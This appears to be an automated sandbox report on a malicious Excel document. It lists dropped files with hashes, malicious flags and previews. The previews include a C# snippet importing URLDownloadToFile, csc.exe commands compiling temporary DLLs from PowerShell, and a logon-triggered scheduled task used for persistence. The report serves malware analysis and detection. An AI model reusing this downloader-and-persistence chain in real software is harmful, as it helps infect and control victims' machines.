                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):369
                                                                    Entropy (8bit):5.21731285206851
                                                                    Encrypted:false
                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f8mnJUzxs7+AEszIP23f8m99:p37Lvkmb6KzUVWZEoUm9
                                                                    MD5:B59FB14C6A5755BC87DC8767D179D21E
                                                                    SHA1:0F1EEAD7BB6EC4EE979C95A17AFF98D57C2128CF
                                                                    SHA-256:9E2F7B369F686CB62E14ACF7FFFDCBADB4C99DDF98DE3AAAA6D224EF16EBDF5E
                                                                    SHA-512:569AC12F950AC9D291C0C563CF0106233DB45488985F6172F23A03D43828F7B458895B5FB24A6EA5029A65EC6AC6FD8B0BFDFB67ACC091FB50041A5AC368A1C7
                                                                    Malicious:true
                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.0.cs"
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):3072
                                                                    Entropy (8bit):2.8459875563298698
                                                                    Encrypted:false
                                                                    SSDEEP:24:etGSjPBG5eAdF8qdd/ka5AYy/oTqtkZf6m8NMEWI+ycuZhNpakSXPNnq:6EsAdeqZguJpsMn1ulpa3Fq
                                                                    MD5:0E37B0F7E7060B37BB2F879D7D03172A
                                                                    SHA1:E92CD4BE97D6034B15FB93CDE310723FEE9A9013
                                                                    SHA-256:2BB13F33F680D74E00B19953D109499F4677A6BC25E709A8FC8F69E98BB31F9E
                                                                    SHA-512:6263D0E3D28293FB64B16611C2E57F5157491108E19467BEE572D7A5152E60A14405ABB0088035223D0808EA2F8932B1B413FC635E464DFBBD19762EB9486DA1
                                                                    Malicious:true
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+.=g...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................1.*...................................................... 8.....P ......J.........P.....[.....g.....s.....u...J.....J...!.J.....J.......!.....*.......8.......................................!..........<Module>.i4
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                    Category:modified
                                                                    Size (bytes):866
                                                                    Entropy (8bit):5.320121512288153
                                                                    Encrypted:false
                                                                    SSDEEP:24:AId3ka6KzU6EoUm4KaMD5DqBVKVrdFAMBJTH:Akka60U6EoUFKdDcVKdBJj
                                                                    MD5:12AAB5BCCA39273130E3468C272765DB
                                                                    SHA1:973DDA98D1527879F0EC0C219673BCFDB228A5CF
                                                                    SHA-256:9D6D5DD1A51F459DFC73F2F9D8F9AC3DCD317C6E1144351DF4B93670D90F6D55
                                                                    SHA-512:4A3B5C416B27D1ABEF9A0C8C56499E1DCE64E3A4B3FFF764AB121AD43CACCB65DCA125610607E3B30F5905FABA414D94DA6202BAEDD2562174E73AAE94CDE15C
                                                                    Malicious:false
                                                                    Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Users\user\AppData\Roaming\caspol.exe
                                                                    File Type:XML 1.0 document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1579
                                                                    Entropy (8bit):5.115370849452323
                                                                    Encrypted:false
                                                                    SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtiNLxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTirv
                                                                    MD5:E058C7784A46B7B4C0F0C61CC4447BD0
                                                                    SHA1:AB5E4BF42CA677CB6B17B546A7FFAEF8CA48FE18
                                                                    SHA-256:AF631C42EE8C5A0CDB32DBB7658BBBE0A50324E81740669C9A30323D0B35A7D9
                                                                    SHA-512:402736C9A8FDA2732FD8004F9BCEE8543A6F2A5513D263271DE399B05C7B08AAEE914DD964F4FE58D7D4DACBE50BC8281224DDF9A95421C6E256E87335CCF75E
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                    Process:C:\Users\user\AppData\Roaming\caspol.exe
                                                                    File Type:XML 1.0 document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1579
                                                                    Entropy (8bit):5.115370849452323
                                                                    Encrypted:false
                                                                    SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtiNLxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTirv
                                                                    MD5:E058C7784A46B7B4C0F0C61CC4447BD0
                                                                    SHA1:AB5E4BF42CA677CB6B17B546A7FFAEF8CA48FE18
                                                                    SHA-256:AF631C42EE8C5A0CDB32DBB7658BBBE0A50324E81740669C9A30323D0B35A7D9
                                                                    SHA-512:402736C9A8FDA2732FD8004F9BCEE8543A6F2A5513D263271DE399B05C7B08AAEE914DD964F4FE58D7D4DACBE50BC8281224DDF9A95421C6E256E87335CCF75E
                                                                    Malicious:true
                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                    Process:C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
                                                                    File Type:XML 1.0 document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1579
                                                                    Entropy (8bit):5.115370849452323
                                                                    Encrypted:false
                                                                    SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtiNLxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTirv
                                                                    MD5:E058C7784A46B7B4C0F0C61CC4447BD0
                                                                    SHA1:AB5E4BF42CA677CB6B17B546A7FFAEF8CA48FE18
                                                                    SHA-256:AF631C42EE8C5A0CDB32DBB7658BBBE0A50324E81740669C9A30323D0B35A7D9
                                                                    SHA-512:402736C9A8FDA2732FD8004F9BCEE8543A6F2A5513D263271DE399B05C7B08AAEE914DD964F4FE58D7D4DACBE50BC8281224DDF9A95421C6E256E87335CCF75E
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    File Type:MSVC .res
                                                                    Category:dropped
                                                                    Size (bytes):652
                                                                    Entropy (8bit):3.1160323863458923
                                                                    Encrypted:false
                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry6lgak7YnqqplFPN5Dlq5J:+RI+ycuZhNQlgakSplFPNnqX
                                                                    MD5:E2824A2693B2A9D60BD6B710CB92E257
                                                                    SHA1:969F9E75166A86CE3283387842A329DF8FB02626
                                                                    SHA-256:1C0594035E7064754C53714AA55B4826AE2B72C013B3B419D3CFD620A30A73F0
                                                                    SHA-512:EB636DFE9D3429CA01D3A96E1B08F001A189ADCBC0663EF63C8FBCCE201112FDE9C9205573642BF89DB9265BA5641165A27F7148BF556462B14171282157A3D3
                                                                    Malicious:false
                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.p.w.v.v.p.v.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...z.p.w.v.v.p.v.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (372)
                                                                    Category:dropped
                                                                    Size (bytes):484
                                                                    Entropy (8bit):3.8560947564999073
                                                                    Encrypted:false
                                                                    SSDEEP:6:V/DsYLDS81zu9l3NPMGHvQXReKJ8SRHy4HXQrBSOscVdmevvIy:V/DTLDfuhAXfHDQjmeYy
                                                                    MD5:FE82050659A8B97690D60529499222C1
                                                                    SHA1:7CC50135852B46DD1E36F2FF98506613DB525A68
                                                                    SHA-256:64C38563C4588B718B03AEC685677F173456D3C961EF97CD95E7784EE1E51A6A
                                                                    SHA-512:59356FD5CBB38A06BF09E182B8ED7C7C2200E6F8DE8E950BE38BEE0C45AA96B2DBF202BDC56097A74ACC4E0A8BC601558E83C098A376630CFA1BCCE64133D64F
                                                                    Malicious:false
                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace WPfW.{. public class dXGM. {. [DllImport("urlmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr ZPntVsRhAh,string MyjpqIkQwDb,string ujQQpSXoIWy,uint M,IntPtr aYypvlykpe);.. }..}.
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):369
                                                                    Entropy (8bit):5.247058552851948
                                                                    Encrypted:false
                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fyZP2Pqzxs7+AEszIP23fyZP2PPn:p37Lvkmb6Kz6ZP2PqWZEo6ZP2PP
                                                                    MD5:C2D6D171E646ACD5A992C45CEF48B28E
                                                                    SHA1:EB2AF197C24C18DF179CDE70CEA44F232B0A7313
                                                                    SHA-256:BA3B9F484180F97E57092756CA1968FCAEE6D6022B8857F20B57A2F2618086F3
                                                                    SHA-512:5B834AD948C0FAC3EAD0188FD4A4520D2721ACBF5904DAC7976B9146BB0816493BC4787F2EECB918167087888EA36EFC65BFABEEB913E990914F9CADCE7979E6
                                                                    Malicious:false
                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.0.cs"
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):3072
                                                                    Entropy (8bit):2.8621138631184917
                                                                    Encrypted:false
                                                                    SSDEEP:24:etGSXcPBG5eAdF8qdd/ka5AY+oTqtkZfL3oMEWI+ycuZhNQlgakSplFPNnq:6TsAdeqZ+uJL3oMn1ulwga3Lfq
                                                                    MD5:739890FBE3C8BE5AACE76078055D80E4
                                                                    SHA1:51D0DEC47702F448F6D54A86ECDC22CA6EAFDC0E
                                                                    SHA-256:89A732AFF0C278C8282F3DC812361150A3F671396FCCD445AF84CAC43254011F
                                                                    SHA-512:AA63BCB4F298306C106676B9341246967615BDE4D2D3C21F7C2CC6D8E8581E7F3D50C2AA2B2965A857EF5B9F6DE365E7DAB130A8CC88DCDDD656373775E2264E
                                                                    Malicious:true
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J.=g...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................1.*...................................................... 8.....P ......J.........P.....[.....g.....s.....u...J.....J...!.J.....J.......!.....*.......8.......................................!..........<Module>.zp
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                    Category:modified
                                                                    Size (bytes):866
                                                                    Entropy (8bit):5.338810386197388
                                                                    Encrypted:false
                                                                    SSDEEP:24:AId3ka6KzYOjEoYO+KaMD5DqBVKVrdFAMBJTH:Akka60DEoeKdDcVKdBJj
                                                                    MD5:F35DA853E4E2F5E829BD10D02BA863CB
                                                                    SHA1:AAB0DCEE08F75D48130B89B84D7D19B5A0C38EC2
                                                                    SHA-256:D594FE1DEFFD9FB1135D05C8B21B53C2CE313AF6FB583823838BEE5EB869E825
                                                                    SHA-512:FBE689246642694DD34C31E24D0B42493119D05FCD3B1F38985E6AAEB6836ABE0012AC7C5B19E02D18E4F9DF25A646E80ED07554D56986F21045775EABC3C53F
                                                                    Malicious:false
                                                                    Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):676352
                                                                    Entropy (8bit):7.983724221826814
                                                                    Encrypted:false
                                                                    SSDEEP:12288:yI9Ien9OVRqfPSMCfhhBKNle3/XPL9dnq/M/+5wyLPH9Jwjm:DLnCRwSNjBKNA/XTDqHLPkj
                                                                    MD5:BE8B2204BF4B1C13E57632D3B2509012
                                                                    SHA1:3D83C474D340C0CA3CE845E5B289BCFCEF7CF57B
                                                                    SHA-256:AF2D0D0D2277ADA25E12029775E265428CDBCB9CD0FBBAC50BE00E3265BDD771
                                                                    SHA-512:6FC0E0DD86E5EE542E9BCF3ADB6346BB42C29429E912D8C151B20D4E4097B28F98CD2D380AA2A01CA5CC7C815567C31F2712021EDDE0BF69D2F45CF86DBCC28D
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):684032
